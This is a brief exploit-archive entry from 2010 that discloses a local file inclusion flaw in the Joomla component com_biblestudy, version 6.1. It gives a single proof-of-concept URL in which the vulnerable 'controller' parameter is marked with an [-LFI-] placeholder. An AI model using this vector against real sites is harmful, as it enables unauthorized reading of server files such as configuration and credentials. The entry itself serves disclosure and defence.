id: 9700
date: 03/18/2010
title: Joomla Component com_biblestudy Local File Include Vulnerability
author: Fl0riX
cves: 

================================================================ 
Joomla Component com_biblestudy Local File Include Vulnerability
================================================================ 

Credit:  	 Fl0riX
Vulnerable: 	Tom Fuller Bible Study 6.1


http://www.example.com/index.php?option=com_biblestudy&id=1&view=studieslist&controller= [-LFI-] 



#  0day.today [2023-03-21]  #